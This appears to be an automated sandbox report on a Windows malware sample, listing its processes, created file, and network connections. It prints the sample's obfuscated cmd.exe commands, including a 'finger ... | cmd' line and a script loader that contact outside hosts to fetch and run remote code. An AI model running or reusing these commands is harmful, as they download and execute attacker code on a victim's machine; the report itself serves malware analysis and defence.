Technical Information
Malicious functions
Creates and executes the following
- '<SYSTEM32>\finger.exe' ok@t382dgeuaua.hivecloud.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "%LOCALAPPDATA%\C7M.js"
Modifies file system
Creates the following files
- %LOCALAPPDATA%\c7m.js
Network activity
Connects to
- 't3######aua.hivecloud.xyz':79
- 'wt####.##vzydvajykxbudate.casa':80
- 'cl###flare.com':443
- 'microsoft.com':80
TCP
- 't3######aua.hivecloud.xyz':79
- 'cl###flare.com':443
UDP
- DNS ASK t3######aua.hivecloud.xyz
- DNS ASK wt####.##vzydvajykxbudate.casa
- DNS ASK cl###flare.com
- DNS ASK microsoft.com
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c finger ok@t382dgeuaua.hivecloud.xyz |more +2 |cmd
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\cmd.exe' /V/D/c "SEt TBPH=.j&&SEt HCAEI=v49jEar49jE a =49jE 'sc49jEri49jEpt49jE:'; b =49jE 'h49jETtP49jE:'; G49jEet49jEObj49jEec49jEt(49jEa+b+'&&sET G5GZ=CUXAQCUXAQwtaa0h.yavzydvajykxbudate.casaCUXAQ?1C...
- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p L68L1="%HCAEI:49jE=%%G5GZ:CUXAQ=/%" 0<nul 1>%LOCALAPPDATA%\C7M%TBPH%s"
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start %LOCALAPPDATA%\C7M%TBPH%s "
- '<SYSTEM32>\cmd.exe' /c start %LOCALAPPDATA%\C7M.js
